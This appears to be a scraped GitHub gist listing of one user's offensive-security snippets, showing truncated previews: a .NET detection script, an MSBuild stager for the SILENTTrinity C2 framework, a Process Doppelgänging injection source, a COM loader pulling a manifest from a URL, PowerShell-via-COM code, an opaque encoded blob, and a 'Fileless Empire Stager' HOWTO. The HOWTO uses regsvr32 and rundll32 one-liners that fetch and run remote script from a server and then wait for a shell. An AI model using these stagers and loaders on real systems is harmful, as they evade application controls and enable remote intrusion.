TheWover
/ CollectDotNetEvents.ps1
Created
January 24, 2019 01:35
— forked from cobbr/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Start-DotNetEventCollection | |
| { | |
| Param( | |
| [Parameter(Position = 0)] | |
| [Alias('PSPath')] | |
| [String] $TracePath = './dotNetTrace.etl', | |
| [Parameter(Position = 1)] | |
| [String] $TraceName = 'dotNetTrace' | |
| ) |
TheWover
/ msbuild.xml
Created
January 24, 2019 03:08
MSBuild stager for SILENTTrinity. Copied so that I can build custom stagers with this as an example.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
| <Target Name="Hello"> | |
| <ST > | |
| </ST> | |
| </Target> | |
| <UsingTask | |
| TaskName="ST" | |
| TaskFactory="CodeTaskFactory" |
TheWover
/ inject.c
Last active
February 1, 2019 18:51
— forked from hfiref0x/inject.c
Process Doppelgänging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // TheWover: Forked this. Note to self, make it do this: https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/ | |
| // | |
| // Ref = src | |
| // https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
| // | |
| // Credits: | |
| // Vyacheslav Rusakov @swwwolf | |
| // Tom Bonner @thomas_bonner | |
| // |
TheWover
/ IsCLRLoadedInProcess.cs
Created
January 24, 2019 20:48
Checks if an arbitrary process has a CLR loaded by checking the modules for "mscor"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // From: https://stackoverflow.com/questions/4997987/how-do-i-determine-if-a-process-is-managed-in-c | |
| public bool IsCLRLoadedInProcess(Process mProcess) | |
| } | |
| foreach (ProcessModule pm in mProcess.Modules) | |
| { | |
| if (pm.ModuleName.StartsWith("mscor", StringComparison.InvariantCultureIgnoreCase)) | |
| { | |
| return true; | |
| } | |
| } |
TheWover
/ WinAPIDocs.txt
Last active
February 2, 2019 17:04
Resources for documentation on various Windows APIs. Especially the ones undocumented by Microsoft.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Win32 & Kernel: | |
| https://www.vergiliusproject.com/ | |
| http://undocumented.ntinternals.net/ | |
| https://www.geoffchappell.com/index.htm | |
| Structs: | |
| http://terminus.rewolf.pl/terminus/ | |
| .NET: | |
| https://referencesource.microsoft.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 7VlrbBzXdT53dmZ2+VqJS4nUg5RXz1CktF6KkijZkiOSu5Lo8iFpSTm0pVLD3RE50XJnNTMrae0qphI7jtDYjRLAiIMmhdO4iNu4Tds4cYu4jhvAgYoYqVv/cABXtX+0RWsEqYsacRLD7nfuDHeXFFurRf+0yCXn3HPPOffc87iv2Rm593MUIiIVzwcfED1HfjlEH17m8URv+/Mofavu5Y3PieGXN47PWm686NgzjjEXzxqFgu3Fp824UyrErUI8NZaJz9k5M9HUVL8l0HEsTTQsQvR9/ZevLuh9gzbFG0SSaB0auk+7ex9AvGLYSokrvt1UFfONUnw0RGceZlH+r9aVSpZ3+ojGAoefCy3j5BmiRrYTcvtuISaVAvsiNc0I2kdr2gnPvOSx3jWBX+uqdteoOJNwXCdLgW2wUTrcvlgO5EMJx8zbWd9Wtlnqit8kN7DUzO2BU0dlF41eR2K8GJG4FR+XKX9FnQhv/SfQX31fb0Bi3Ga0O6Gy3tsEvZ0twGDZCqLOVYx20fpkSJqMPs3UfZLIXQ1GPemK3QqkwQGjGH7M+uxW7t/GncKNN3r1HWHdXsOt15vI6YaMUmev5cHWySE+g5E61zNKN4jaWtTupyJdop39bKB4N4AsKu3aS5sgK1qSCm3zQ9dMoXrdMaCzEx3qdyrddUon6HpDd13ro10QbuimMOr1SZUeJZ5r6EOK3QFpewOb332fbt/G5lPYRiLqQ1JTY2THADnnoDgUeGJvRNWEGtGpf1XqblHrmtXWZvUxy94M4rZmtUW70V23I1wX+Eu6vYXN+vKNhpoo+Ia1aN3UrHVxPKWvB2jzlO+rQlGaKfk4233Gn05BzLey0YrzJExzt7Hd4VAnvNIb9UhrBJZ8hMfQW91ONvfG9haVnGch26z6MW9bNuZa91N1XWKlH+eePbTZj7NGD4Ki8did23lc3e6SQzo/5TTa3RzFHTI8zs84VguNsKCi6mwG7ITleufOGsF+UNs+ezsG8CmqM7Ig16h3JkDyHYFE |
TheWover
/ regfreeCom.ps1
Created
February 19, 2019 19:34
— forked from nicholasmckinney/regfreeCom.ps1
Registration-Free Com Object from URL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Make Sure dynwrapx,dll is in %temp% | |
| $a = new-object -com Microsoft.Windows.ActCtx | |
| $a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest' | |
| $b = $a.CreateObject("DynamicWrapperX") | |
| $b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null | |
| $b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null | |
TheWover
/ EmpireCOMPosh.cs
Created
February 19, 2019 19:34
— forked from nicholasmckinney/EmpireCOMPosh.cs
Allows PowerShell Commands To Execute via JavaScript via COM. PowerShell without PowerShell.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; |
TheWover
/ DynamicWrapperCS.cs
Created
February 19, 2019 19:35
— forked from nicholasmckinney/DynamicWrapperCS.cs
Dynamic Wrapper 1.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| using System.Runtime; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| using System.EnterpriseServices; | |
| using ComTypes = System.Runtime.InteropServices.ComTypes; | |
TheWover
/ HOWTO
Created
February 19, 2019 19:35
— forked from nicholasmckinney/HOWTO
Fileless Empire Stager
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create Empire Listener | |
| 2. Generate Stager | |
| 3. Host Stager Code At Some URL | |
| 4. Host .sct File At Some URL | |
| 5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
| 6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
| -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
| 7. Wait for Shell... |